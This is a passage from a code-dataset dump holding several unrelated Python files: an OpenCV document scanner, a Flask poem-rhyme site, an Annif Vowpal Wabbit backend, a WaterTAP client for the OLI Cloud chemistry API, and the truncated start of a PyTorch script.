np.diff(myPoints,axis=1)\n myPointsNew[1] = myPoints[np.argmin(diff)]\n myPointsNew[2] = myPoints[np.argmax(diff)]\n #print(\"New points\",myPointsNew)\n return myPointsNew\n\n\n\ndef getWarp(img, biggest):\n biggest = sorter(biggest)\n pts1 = np.float32(biggest)\n pts2 = np.float32([[0, 0], [imageWidth, 0], [0, imageHeight], [imageWidth, imageHeight]])\n\n matrix = cv.getPerspectiveTransform(pts1, pts2)\n imgOutput = cv.warpPerspective(img, matrix, (imageWidth, imageHeight))\n\n imgCropped = imgOutput[20:imgOutput.shape[0]-20,20:imgOutput.shape[1]-20]\n imgCropped = cv.resize(imgCropped,(imageWidth,imageHeight))\n\n return imgCropped\n\ndef preProcessing(img):\n imgGray = cv.cvtColor(img,cv.COLOR_BGR2GRAY)\n imgBlur = cv.GaussianBlur(imgGray,(5,5),1)\n imgCanny = cv.Canny(imgBlur,150,150)\n kernel = np.ones((3,3))\n imgDial = cv.dilate(imgCanny,kernel,iterations=2)\n imgErode = cv.erode(imgDial,kernel,iterations =1)\n\n return imgErode\n\n\nwhile True:\n #success, img = cap.read()\n\n img = cv.resize(img,(imageWidth,imageHeight))\n imgContour = img.copy()\n imgThreshold = preProcessing(img)\n #cv.imshow('img',imgThreshold)\n biggest = getContours(imgThreshold)\n if biggest.size != 0:\n imgWarped = getWarp(img,biggest)\n cv.imshow('Stacked',stackImages(0.6,[img,imgThreshold,imgWarped]))\n else:\n cv.imshow('Stacked', stackImages(0.6, [img, img, img]))\n #cv.imshow('WebCam',imgWarped)\n #cv.imshow('WebCam',img)\n if cv.waitKey(0) & 0xFF == ord('q'):\n break\n\n\n\n\n","sub_path":"YouTube_OpenCV_3_Hours_Course/project2.py","file_name":"project2.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"38908750","text":"from flask import Flask\nfrom flask import request, render_template\nimport sqlite3\nimport random\nimport re\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n conn = sqlite3.connect('live_poems.bd')\n c = conn.cursor()\n\n if request.args:\n line = request.args[\"line_input\"]\n rhyme, author = find_rhyme(line)\n return render_template(\"main.html\", poem_line=rhyme, author=author, line=\"Вы ввели: {}\".format(line))\n return render_template(\"main.html\", poem_line=\"\", author=\"\", line=\"\")\n\n\ndef find_rhyme(line):\n conn = sqlite3.connect(\"live_poems.bd\")\n c = conn.cursor()\n\n c.execute(\"SELECT line FROM poems\")\n lines = c.fetchall()\n lines = [i[0] for i in lines]\n\n ending = re.sub(\"[.,?!\\-—:;)(\\\"\\' ]\", \"\", line)[-3:]\n\n appr_lines = [i for i in lines if re.sub(\"[.,?!\\-—:;)(\\\"\\' ]\", \"\", i).endswith(ending)]\n\n if \"я\" in ending or \"ю\" in ending or \"ё\" in ending:\n ending = ending.replace(\"я\", \"а\").replace(\"ю\", \"у\").replace(\"ё\", \"о\")\n appr_lines.extend([i for i in lines if re.sub(\"[.,?!\\-—:;)(\\\"\\' ]\", \"\", i).endswith(ending)])\n\n\n if len(appr_lines) != 0:\n res = appr_lines[random.randint(0, len(appr_lines) - 1)]\n\n c.execute(\"SELECT poet FROM poets INNER JOIN poems ON poets.id == poems.author WHERE line==(?)\", (res,))\n author = c.fetchone()[0]\n return res, author\n else:\n return \"ой, стихотворения с такой рифмой не найдено:(\", \"создатель сайта\"\n\n\nif __name__ == '__main__':\n import os\n app.debug = True\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port)\n","sub_path":"FinalProject/web_site_flask.py","file_name":"web_site_flask.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"370499602","text":"\"\"\"Annif backend using the Vowpal Wabbit multiclass and multilabel\nclassifiers\"\"\"\n\nimport random\nimport numpy as np\nimport annif.project\nfrom annif.suggestion import ListSuggestionResult, VectorSuggestionResult\nfrom annif.exception import ConfigurationException\nfrom . import vw_base\nfrom . import backend\nfrom . import mixins\n\n\nclass VWMultiBackend(mixins.ChunkingBackend, vw_base.VWBaseBackend):\n \"\"\"Vowpal Wabbit multiclass/multilabel backend for Annif\"\"\"\n\n name = \"vw_multi\"\n needs_subject_index = True\n\n VW_PARAMS = {\n 'bit_precision': (int, None),\n 'ngram': (lambda x: '_{}'.format(int(x)), None),\n 'learning_rate': (float, None),\n 'loss_function': (['squared', 'logistic', 'hinge'], 'logistic'),\n 'l1': (float, None),\n 'l2': (float, None),\n 'passes': (int, None),\n 'probabilities': (bool, None)\n }\n\n SUPPORTED_ALGORITHMS = ('oaa', 'ect', 'log_multi', 'multilabel_oaa')\n\n DEFAULT_INPUTS = '_text_'\n\n DEFAULT_PARAMS = {'algorithm': 'oaa'}\n\n def default_params(self):\n params = backend.AnnifBackend.DEFAULT_PARAMS.copy()\n params.update(mixins.ChunkingBackend.DEFAULT_PARAMS)\n params.update(self.DEFAULT_PARAMS)\n params.update({param: default_val\n for param, (_, default_val) in self.VW_PARAMS.items()\n if default_val is not None})\n return params\n\n @property\n def algorithm(self):\n algorithm = self.params['algorithm']\n if algorithm not in self.SUPPORTED_ALGORITHMS:\n raise ConfigurationException(\n \"{} is not a valid algorithm (allowed: {})\".format(\n algorithm, ', '.join(self.SUPPORTED_ALGORITHMS)),\n backend_id=self.backend_id)\n return algorithm\n\n @property\n def inputs(self):\n inputs = self.params.get('inputs', self.DEFAULT_INPUTS)\n return inputs.split(',')\n\n @staticmethod\n def _cleanup_text(text):\n # colon and pipe chars have special meaning in VW and must be avoided\n return text.replace(':', '').replace('|', '')\n\n def _normalize_text(self, text):\n ntext = ' '.join(self.project.analyzer.tokenize_words(text))\n return VWMultiBackend._cleanup_text(ntext)\n\n def _uris_to_subject_ids(self, uris):\n subject_ids = []\n for uri in uris:\n subject_id = self.project.subjects.by_uri(uri)\n if subject_id is not None:\n subject_ids.append(subject_id)\n return subject_ids\n\n def _format_examples(self, text, uris):\n subject_ids = self._uris_to_subject_ids(uris)\n if self.algorithm == 'multilabel_oaa':\n yield '{} {}'.format(','.join(map(str, subject_ids)), text)\n else:\n for subject_id in subject_ids:\n yield '{} {}'.format(subject_id + 1, text)\n\n def _get_input(self, input, text):\n if input == '_text_':\n return self._normalize_text(text)\n else:\n proj = annif.project.get_project(input)\n result = proj.suggest(text)\n features = [\n '{}:{}'.format(self._cleanup_text(hit.uri), hit.score)\n for hit in result.hits]\n return ' '.join(features)\n\n def _inputs_to_exampletext(self, text):\n namespaces = {}\n for input in self.inputs:\n inputtext = self._get_input(input, text)\n if inputtext:\n namespaces[input] = inputtext\n if not namespaces:\n return None\n return ' '.join(['|{} {}'.format(namespace, featurestr)\n for namespace, featurestr in namespaces.items()])\n\n def _create_examples(self, corpus):\n examples = []\n for doc in corpus.documents:\n text = self._inputs_to_exampletext(doc.text)\n if not text:\n continue\n examples.extend(self._format_examples(text, doc.uris))\n random.shuffle(examples)\n return examples\n\n def _create_model(self):\n self.info('creating VW model (algorithm: {})'.format(self.algorithm))\n super()._create_model({self.algorithm: len(self.project.subjects)})\n\n def _convert_result(self, result):\n if self.algorithm == 'multilabel_oaa':\n # result is a list of subject IDs - need to vectorize\n mask = np.zeros(len(self.project.subjects), dtype=np.float32)\n mask[result] = 1.0\n return mask\n elif isinstance(result, int):\n # result is a single integer - need to one-hot-encode\n mask = np.zeros(len(self.project.subjects), dtype=np.float32)\n mask[result - 1] = 1.0\n return mask\n else:\n # result is a list of scores (probabilities or binary 1/0)\n return np.array(result, dtype=np.float32)\n\n def _suggest_chunks(self, chunktexts):\n results = []\n for chunktext in chunktexts:\n\n exampletext = self._inputs_to_exampletext(chunktext)\n if not exampletext:\n continue\n example = ' {}'.format(exampletext)\n result = self._model.predict(example)\n results.append(self._convert_result(result))\n if not results: # empty result\n return ListSuggestionResult(\n hits=[], subject_index=self.project.subjects)\n return VectorSuggestionResult(\n np.array(results, dtype=np.float32).mean(axis=0),\n self.project.subjects)\n","sub_path":"annif/backend/vw_multi.py","file_name":"vw_multi.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"188209656","text":"###############################################################################\n# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,\n# National Renewable Energy Laboratory, and National Energy Technology\n# Laboratory (subject to receipt of any required approvals from the U.S. Dept.\n# of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#\n# OLI Systems, Inc. Copyright © 2022, all rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation and/or\n# other materials provided with the distribution.\n#\n# 3. Neither the name of OLI Systems, Inc. nor the names of any contributors to\n# the software made available herein may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY\n# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\n# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT\n# SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# You are under no obligation whatsoever to provide any bug fixes, patches, or upgrades to the\n# features, functionality or performance of the source code (\"Enhancements\") to anyone; however,\n# if you choose to make your Enhancements available either publicly, or directly to OLI Systems, Inc.,\n# without imposing a separate written license agreement for such Enhancements, then you hereby grant\n# the following license: a non-exclusive, royalty-free perpetual license to install, use, modify, prepare\n# derivative works, incorporate into other computer software, distribute, and sublicense such enhancements\n# or derivative works thereof, in binary and source code form.\n###############################################################################\n\n\"\"\"\nThis class provides methods for using the OLI Cloud API and augments the code provided via\nOLI API documentation. [WIP]\n\nMost of this code was adopted from examples in OLI's documentation, with modifications implemented for\ninterfacing w/WaterTap and addition of other functions for better utilizing OLI API functionality\n\n\"\"\"\n\nimport requests\nimport json\nimport time\nimport getpass\nimport os\n\n# Imports for methods that can be separated from this class and located in another module\nfrom pyomo.environ import units as pyunits, value, Set\nfrom pyomo.util.check_units import check_units_equivalent\nfrom idaes.core.util.exceptions import ConfigurationError\nimport yaml\nimport numpy as np\nfrom copy import deepcopy\n\n\n__author__ = \"Adam Atia, Adi Bannady\"\n\n\nclass OLIApi:\n \"\"\"\n A class to wrap OLI Cloud API calls to be accessible in a simple manner. This\n is just an example\n \"\"\"\n\n def __init__(self, username=None, password=None, root_url=None, auth_url=None):\n \"\"\"\n Constructs all necessary attributes for OLIApi class\n\n Args:\n username: user's username\n password: user's password\n root_url: root url\n auth_url: authorization url\n \"\"\"\n if username is None or not len(username):\n username = input(\"Enter OLI username:\\n\")\n if password is None or not len(password):\n password = getpass.getpass(\"Enter OLI user password:\\n\")\n if root_url is None or not len(root_url):\n root_url = input(\"Enter root url:\\n\")\n if auth_url is None or not len(password):\n auth_url = input(\"Enter authorization token:\\n\")\n self.__username = username\n self.__password = password\n self.__jwt_token = \"\"\n self.__refresh_token = \"\"\n self.__root_url = root_url\n self.__auth_url = auth_url\n self.__dbs_url = self.__root_url + \"/channel/dbs\"\n self.__upload_dbs_url = self.__root_url + \"/channel/upload/dbs\"\n\n def login(self, tee=True, fail_flag=True):\n \"\"\"\n Login into user credentials for the OLI Cloud\n\n Args:\n tee: boolean argument to print status code when True\n fail_flag: boolean argument to raise exception upon login failure when True\n Returns: True on success, False on failure\n \"\"\"\n\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n\n body = {\n \"username\": self.__username,\n \"password\": self.__password,\n \"grant_type\": \"password\",\n \"client_id\": \"apiclient\",\n }\n\n req_result = requests.post(self.__auth_url, headers=headers, data=body)\n\n if req_result.status_code == 200:\n if tee:\n print(f\"Status code is {req_result.status_code}\")\n req_result = req_result.json()\n if \"access_token\" in req_result:\n self.__jwt_token = req_result[\"access_token\"]\n if \"refresh_token\" in req_result:\n self.__refresh_token = req_result[\"refresh_token\"]\n\n return True\n if fail_flag:\n raise Exception(\n f\"OLI login failed. Status code is {req_result.status_code}.\"\n )\n\n return False\n\n def refresh_token(self):\n \"\"\"\n Refreshes the access token using the refresh token got obtained on login\n Returns: True on success, False on failure\n \"\"\"\n\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n\n body = {\n \"refresh_token\": self.__refresh_token,\n \"grant_type\": \"refresh_token\",\n \"client_id\": \"apiclient\",\n }\n\n req_result = requests.post(self.__auth_url, headers=headers, data=body)\n if req_result.status_code == 200:\n req_result = req_result.json()\n if bool(req_result):\n if \"access_token\" in req_result:\n self.__jwt_token = req_result[\"access_token\"]\n if \"refresh_token\" in req_result:\n self.__refresh_token = req_result[\"refresh_token\"]\n return True\n\n return False\n\n def request_auto_login(self, req_func):\n \"\"\"\n Gets a new access token if the request returns with an expired token error. First tries with the refresh token\n if it's still active or simple relogs in using the username and password.\n\n Args:\n req_func: function to call\n Returns: an empty dict if failed\n \"\"\"\n\n num_tries = 1\n while num_tries <= 2:\n\n headers = {\"authorization\": \"Bearer \" + self.__jwt_token}\n\n req_result = req_func(headers)\n if req_result.status_code == 200:\n ret_val = json.loads(req_result.text)\n return ret_val\n elif num_tries == 1 and req_result.status_code == 401:\n req_result = req_result.json()\n if not self.refresh_token():\n if not self.login():\n break\n else:\n break\n num_tries = num_tries + 1\n\n return dict()\n\n def upload_dbs_file(self, file_path):\n \"\"\"\n Uploads a dbs file to the OLI Cloud given a full file path.\n\n Args:\n file_path: full path to dbs file\n Returns: dictionary containing the uploaded file ID\n \"\"\"\n req_result = dict()\n\n # read the file data in\n try:\n with open(file_path, \"rb\") as file:\n files = {\"files\": file}\n\n req_result = self.request_auto_login(\n lambda headers: requests.post(\n self.__upload_dbs_url, headers=headers, files=files\n )\n )\n except IOError:\n pass\n\n return req_result\n\n def get_user_dbs_files(self):\n \"\"\"\n Returns a dictionary containing a list of all user dbs file(s) uploaded\n \"\"\"\n return self.request_auto_login(\n lambda headers: requests.get(self.__dbs_url, headers=headers)\n )\n\n # TODO: put in an extra measure to load an existing DBS instead of constantly regenerating duplicates on the cloud\n def generate_chemistry_file(\n self, function_name, chemistry_model_file_id=\"\", json_input=dict()\n ):\n \"\"\"\n calls chemistry-builder function in the OLI Engine API.\n\n Args:\n function_name: name of function to call\n chemistry_model_file_id: the chemistry model file if for this calculation\n json_input: calculation input JSON\n poll_time: max delay between each call\n max_request: maximum requests\n Returns: dictionary containing result or error\n \"\"\"\n\n # formulate url\n endpoint = \"\"\n method = \"POST\"\n if function_name == \"chemistry-builder\":\n endpoint = self.__root_url + \"/channel/dbs\"\n method = \"POST\"\n elif function_name == \"chemistry-info\":\n endpoint = (\n self.__root_url\n + \"/engine/file/\"\n + chemistry_model_file_id\n + \"/\"\n + function_name\n )\n method = \"GET\"\n else:\n return dict()\n\n # http body\n if bool(json_input):\n data = json.dumps(json_input)\n else:\n data = \"\"\n\n def add_additional_header(headers):\n headers[\"content-type\"] = \"application/json\"\n if method == \"POST\":\n return requests.post(endpoint, headers=headers, data=data)\n\n output = requests.get(endpoint, headers=headers, data=data)\n with open(\"Data/Out.txt\", \"w\") as outfile:\n outfile.write(str(output.text))\n return output\n\n request_result1 = self.request_auto_login(add_additional_header)\n return request_result1\n\n def call(\n self,\n function_name,\n chemistry_model_file_id,\n json_input=dict(),\n poll_time=1.0,\n max_request=1000,\n tee=False,\n ):\n \"\"\"\n calls a function in the OLI Engine API.\n\n Args:\n function_name: name of function to call\n chemistry_model_file_id: the chemistry model file if for this calculation\n json_input: calculation input JSON\n poll_time: max delay between each call\n max_request: maximum requests\n tee: boolean argument to hide or display print messages\n Returns: dictionary containing result or error\n \"\"\"\n\n # formulate url\n endpoint = \"\"\n method = \"POST\"\n if (\n function_name == \"chemistry-info\"\n or function_name == \"corrosion-contact-surface\"\n ):\n endpoint = (\n self.__root_url\n + \"/engine/file/\"\n + chemistry_model_file_id\n + \"/\"\n + function_name\n )\n method = \"GET\"\n else:\n endpoint = (\n self.__root_url\n + \"/engine/flash/\"\n + chemistry_model_file_id\n + \"/\"\n + function_name\n )\n method = \"POST\"\n\n # http body\n if bool(json_input):\n data = json.dumps(json_input)\n else:\n data = \"\"\n\n def add_additional_header(headers):\n headers[\"content-type\"] = \"application/json\"\n if method == \"POST\":\n return requests.post(endpoint, headers=headers, data=data)\n\n output = requests.get(endpoint, headers=headers, data=data)\n\n return output\n\n # first call\n results_link = \"\"\n start_time = time.time()\n request_result1 = self.request_auto_login(add_additional_header)\n end_time = time.time()\n request_time = end_time - start_time\n if tee:\n print(\"First request time =\", request_time)\n if bool(request_result1):\n if request_result1[\"status\"] == \"SUCCESS\":\n if \"data\" in request_result1:\n if \"status\" in request_result1[\"data\"]:\n if (\n request_result1[\"data\"][\"status\"] == \"IN QUEUE\"\n or request_result1[\"data\"][\"status\"] == \"IN PROGRESS\"\n ):\n if \"resultsLink\" in request_result1[\"data\"]:\n results_link = request_result1[\"data\"][\"resultsLink\"]\n if tee:\n print(results_link)\n\n # error in getting results link\n if results_link == \"\":\n return dict()\n\n # poll on results link until success\n data = \"\"\n endpoint = results_link\n method = \"GET\"\n request_iter = 0\n while True:\n # make request and time\n start_time = time.time()\n request_result2 = self.request_auto_login(add_additional_header)\n end_time = time.time()\n request_time = end_time - start_time\n if tee:\n print(\"Second request time =\", request_time)\n\n # check if max requests exceeded\n request_iter = request_iter + 1\n if request_iter > max_request:\n break\n\n # extract\n if tee:\n print(request_result2)\n if bool(request_result2):\n if \"status\" in request_result2:\n status = request_result2[\"status\"]\n if tee:\n print(status)\n if status == \"PROCESSED\" or status == \"FAILED\":\n if \"data\" in request_result2:\n return request_result2[\"data\"]\n else:\n break\n elif status == \"IN QUEUE\" or status == \"IN PROGRESS\":\n if poll_time > request_time:\n time.sleep(poll_time - request_time)\n continue\n else:\n break\n else:\n break\n else:\n break\n\n return dict()\n\n # TODO: check this. Adding this function to easily access job id\n def get_flash_history(self, dbs_file_id):\n \"\"\"\n Retrieves history of flash information, e.g., input for a chemistry model\n Args:\n dbs_file_id: the DBS file ID\n Returns: dictionary containing array of submitted jobs, from which the jobID and input data can be obtained\n \"\"\"\n endpoint = f\"{self.__root_url}/engine/flash/history/{dbs_file_id}\"\n\n return self.request_auto_login(\n lambda headers: requests.get(endpoint, headers=headers)\n )\n\n def get_job_id(self, dbs_file_id):\n \"\"\"\n Retrieves jobID which is useful for troubleshooting with OLI Support Team\n Args:\n dbs_file_id: the DBS file ID\n Returns: OLI jobID\n \"\"\"\n flash_h = self.get_flash_history(dbs_file_id)\n id = flash_h[\"data\"][0][\"jobId\"]\n\n return id\n\n # TODO: add testing for this function\n # TODO: check if DBS exists --> if a suitable one exists, use that and do NOT create a new one\n def get_dbs_file_id(\n self,\n dbs_file_path=None,\n ions=None,\n phases=None,\n thermo_framework=None,\n model_name=None,\n ):\n \"\"\"\n Returns the chemistry file ID (dbs_file_id) from either\n (1) creating a DBS dict that requires ion names and is then fed to chemistry-builder or\n (2) an uploaded DBS via the \"manual\" workflow without using chemistry-builder\n\n Args:\n dbs_file_path: file path to DBS file.\n ions: ion names as pyomo set\n Returns: chemistry file ID as a string\n \"\"\"\n if dbs_file_path is not None and ions is not None:\n raise IOError(\n \"Either provide a list, dict or Pyomo set of OLI-compatible names\"\n \" or set dbs_file_path to a path to dbs file already generated, but not both.\"\n )\n if dbs_file_path is not None:\n if not os.path.isfile(dbs_file_path) and not os.path.islink(dbs_file_path):\n raise OSError(\n \"Could not find requested path to file. Please \"\n \"check that this path to file exists.\"\n )\n result = self.upload_dbs_file(dbs_file_path)\n chemistry_file_id = result[\"file\"][0][\"id\"]\n return chemistry_file_id\n else:\n # TODO: Check for folder with chemistry_file_id, prompt user to use existing file ID or continue with new, save new to chemistr_file_ID folder for later use\n data = self.create_dbs_dict(ions, phases, thermo_framework, model_name)\n chemistry_file = self.generate_chemistry_file(\"chemistry-builder\", \"\", data)\n if len(chemistry_file) > 0:\n return chemistry_file[\"data\"][\"id\"]\n else:\n raise OSError(\n \"The OLI API didn't return any result. Either input was \"\n \"incorrectly provided, or there is a temporary issue with \"\n \"the OLI Cloud API\"\n )\n\n ########################################################################################################\n # Methods that can be separated from this class and placed in a different module\n # TODO: add testing for this function\n def create_dbs_dict(\n self, ions=None, phases=None, thermo_framework=None, model_name=None\n ):\n \"\"\"\n Creates dict for chemistry-builder to later generate a DBS file ID\n Args:\n ions: OLI-compatible ion names as a Pyomo Set, list, or dict where the keys are ion names\n phases: OLI-compatible phases; if None, use default of liquid1 and solid\n Returns: dbs_dict: dictionary in OLI format needed to generate chemistry [DBS] file ID\n\n #TODO: support not None for phases\n \"\"\"\n\n if phases is None:\n phase_lst = [\"liquid1\", \"solid\"]\n if thermo_framework is None:\n thermo_framework = \"MSE (H3O+ ion)\"\n if model_name is None:\n model_name = \"testModel\"\n\n if ions is None:\n raise IOError(\n 'Provide a list, dict, or Pyomo set of OLI-compatible ion names (e.g., \"NAION\")'\n )\n tmp_dict = {}\n ion_lst = []\n if isinstance(ions, Set):\n for ion in ions:\n tmp_dict[\"name\"] = ion\n ion_lst.append(tmp_dict.copy())\n elif isinstance(ions, dict):\n for ion in ions.keys():\n tmp_dict[\"name\"] = ion\n ion_lst.append(tmp_dict.copy())\n elif isinstance(ions, list):\n for ion in ions:\n tmp_dict[\"name\"] = ion\n ion_lst.append(tmp_dict.copy())\n\n dbs_data = {\n \"method\": \"chemistrybuilder.generateDBS\",\n \"params\": {\n \"thermodynamicFramework\": thermo_framework, # TODO: make this an option\n \"modelName\": model_name, # TODO: make this an option\n \"phases\": phase_lst, # TODO: make this an option\n \"inflows\": ion_lst, # TODO: make test for this\n \"unitSetInfo\": { # TODO: UnitSetInfo doesn't seem to be working in API\n \"tds\": \"mg/L\",\n # \"solid_phs_comp\": \"g/g\"\n },\n },\n }\n return dbs_data\n\n # TODO: this needs more thought on dealing with a stateblock\n # - add testing for this function\n def create_input_dict(\n self, stateblock, time_point=None, AllowSolidsToForm=False, zero_species=None\n ):\n \"\"\"\n Creates dict for call function that performs calculations via OLI Cloud API\n stateblock: stateblock that contains ion concentrations, ion charge, temp and pressure\n time_point: stateblock time dimension\n \"\"\"\n if time_point is None:\n time_point = 0\n if zero_species is not None:\n for comp in zero_species:\n if comp not in stateblock[time_point].component_list:\n raise ConfigurationError(\n f\"{comp} was specified in zero_species but is not included in the components provided.\"\n )\n tmp_list = []\n tmp_dict = {}\n\n # TODO: need to check indexes and whether should be conc_mass_comp or conc_mass_phase_comp\n # - for now, expecting conc_mass_phase_comp\n for (p, j), val in stateblock[time_point].conc_mass_phase_comp.items():\n if j != \"H2O\":\n if stateblock[time_point].charge_comp[j].value < 0:\n tmp_dict.update({\"group\": \"Anions\"})\n elif stateblock[time_point].charge_comp[j].value > 0:\n tmp_dict.update({\"group\": \"Cations\"})\n elif stateblock[time_point].charge_comp[j].value == 0:\n tmp_dict.update({\"group\": \"Neutrals\"})\n else:\n raise ConfigurationError(\n \"Each ion, solute, or other component should have a 'charge_comp' property \"\n \"for charge. A value of 0 should be assigned for neutral species.\"\n )\n\n tmp_dict.update({\"name\": j})\n tmp_dict.update({\"unit\": \"mg/L\"})\n\n if check_units_equivalent(val, pyunits.kg / pyunits.m**3):\n conc_tmp = pyunits.convert(val, to_units=pyunits.mg / pyunits.L)\n tmp_dict.update({\"value\": value(conc_tmp)})\n if zero_species is not None:\n if j in zero_species:\n tmp_dict.update({\"value\": 0})\n tmp_dict.update(\n {\"charge\": value(stateblock[time_point].charge_comp[j])}\n )\n tmp_list.append(tmp_dict.copy())\n tmp_list.append(\n {\n \"group\": \"Properties\",\n \"name\": \"Temperature\",\n \"unit\": \"°C\",\n \"value\": value(\n pyunits.convert_temp_K_to_C(\n value(stateblock[time_point].temperature)\n )\n ),\n }\n ) # TODO: conditional to check temp units and convert\n tmp_list.append(\n {\n \"group\": \"Properties\",\n \"name\": \"Pressure\",\n \"unit\": \"Pa\",\n \"value\": value(stateblock[time_point].pressure),\n }\n ) # TODO: conditional to check pressure units and convert\n tmp_list.append(\n {\n \"group\": \"Electroneutrality Options\",\n \"name\": \"ElectroNeutralityBalanceType\",\n \"value\": \"DominantIon\", # TODO: add argument to choose this\n }\n )\n tmp_list.append(\n {\n \"group\": \"Calculation Options\",\n \"name\": \"CalcType\",\n \"value\": \"EquilCalcOnly\", # TODO: add argument to choose this\n }\n )\n tmp_list.append(\n {\n \"group\": \"Calculation Options\",\n \"name\": \"CalcAlkalnity\",\n \"value\": False, # TODO: add argument to choose this\n }\n )\n tmp_list.append(\n {\n \"group\": \"Calculation Options\",\n \"name\": \"AllowSolidsToForm\",\n \"value\": AllowSolidsToForm, # TODO: add argument to choose this\n }\n )\n\n input_dict = {\n \"params\": {\n \"waterAnalysisInputs\": tmp_list,\n \"optionalProperties\": {\n \"scalingIndex\": True, # TODO: add argument to add properties\n \"scalingTendencies\": True,\n \"kValuesMBased\": True,\n },\n \"unitSetInfo\": { # TODO: UnitSetInfo doesn't seem to be working in API\n \"tds\": \"mg/L\",\n \"solid_phs_comp\": \"g/g\",\n \"liquid_phs_comp\": \"mg/L\",\n },\n }\n }\n\n return input_dict\n\n def composition_survey(\n self,\n survey=None,\n chemistry_file_ID=None,\n input_dict=None,\n stateblock=None,\n time_point=None,\n AllowSolidsToForm=False,\n zero_species=None,\n tee=True,\n ):\n \"\"\"\n This method allows the user to conduct an OLI composition survey.\n A survey can be conducted over as many components as desired, hypothetically, enabled by _recursive_survey().\n\n Args:\n survey: dictionary with component name as the key, and the min, max, and number of samples (corresponding to start, stop, and num args in numpy linspace)\n e.g.: {\"CAOH2\": (0, 350, 3), \"NA2CO3\": (0, 350, 3), \"NAION\": (10000,20000,3),}\n chemistry_file_ID: OLI chemistry file ID (i.e., DBS file ID)\n input_dict: dictionary with input concentration data for call function which runs calculations in OLI Cloud API\n\n Returns:\n final_results: OLI results\n inflows: inflow data used in OLI calculations\n\n \"\"\"\n if chemistry_file_ID is not None:\n if input_dict is not None:\n if survey is not None:\n vec_list = []\n index_list = []\n num_loops = len(survey)\n for i, key in enumerate(survey.keys()):\n vec_list.append(\n np.linspace(\n survey[key][0], survey[key][1] + 1, survey[key][2]\n )\n )\n index_list.append(\n next(\n (\n i\n for i, item in enumerate(\n input_dict[\"params\"][\"waterAnalysisInputs\"]\n )\n if item[\"name\"] == key\n ),\n None,\n )\n )\n if index_list[i] is None:\n raise ConfigurationError(\n f\"{key} was not found in the components specified in your chemistry file. \"\n f\"Check the name of the component {key} and make sure it matches the \"\n f\"intended component.\"\n )\n final_results, inflows = self._recursive_survey(\n vec_list,\n index_list,\n number_surveys=num_loops - 1,\n chemistry_file_ID=chemistry_file_ID,\n input_dict=input_dict,\n tee=tee,\n )\n\n return final_results, inflows\n\n def _recursive_survey(\n self,\n vec_list,\n index_list,\n number_surveys,\n chemistry_file_ID,\n input_dict,\n results=None,\n tee=True,\n inflows=None,\n ):\n \"\"\"\n Recursive function to enable user-defined number of composition surveys\n \"\"\"\n if results is None:\n results = []\n if inflows is None:\n inflows = []\n\n if number_surveys >= 1:\n for val in vec_list[number_surveys]:\n input_dict[\"params\"][\"waterAnalysisInputs\"][index_list[number_surveys]][\n \"value\"\n ] = val\n\n self._recursive_survey(\n vec_list,\n index_list,\n number_surveys - 1,\n chemistry_file_ID,\n input_dict,\n results=results,\n tee=tee,\n inflows=inflows,\n )\n\n else:\n for val in vec_list[number_surveys]:\n input_dict[\"params\"][\"waterAnalysisInputs\"][index_list[number_surveys]][\n \"value\"\n ] = val\n inflows.append(deepcopy(input_dict))\n if tee:\n print(input_dict)\n results.append(\n self.call(\"wateranalysis\", chemistry_file_ID, input_dict)\n )\n\n return results, inflows\n\n def write_results_to_yaml(self, results_dict, filename=None):\n if filename is None:\n filename = \"oli_results\"\n with open(f\"{filename}.yaml\", \"w\") as yamlfile:\n yaml.dump(results_dict, yamlfile)\n print(\n \"OLI results write to yaml successful. Check working directory for oli_results.yaml file.\"\n )\n","sub_path":"watertap/core/util/oli_api.py","file_name":"oli_api.py","file_ext":"py","file_size_in_byte":30141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"347195345","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nfrom torch.utils.data import Dataset, DataLoader, RandomSampler\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.nn.utils.rnn import pad_sequence\nfrom torch.utils.data import Dataset, DataLoader, RandomSampler\nfrom typing import Tuple, List\n\nfrom model.generator import Generator\nimport argparse\nfrom pathlib import 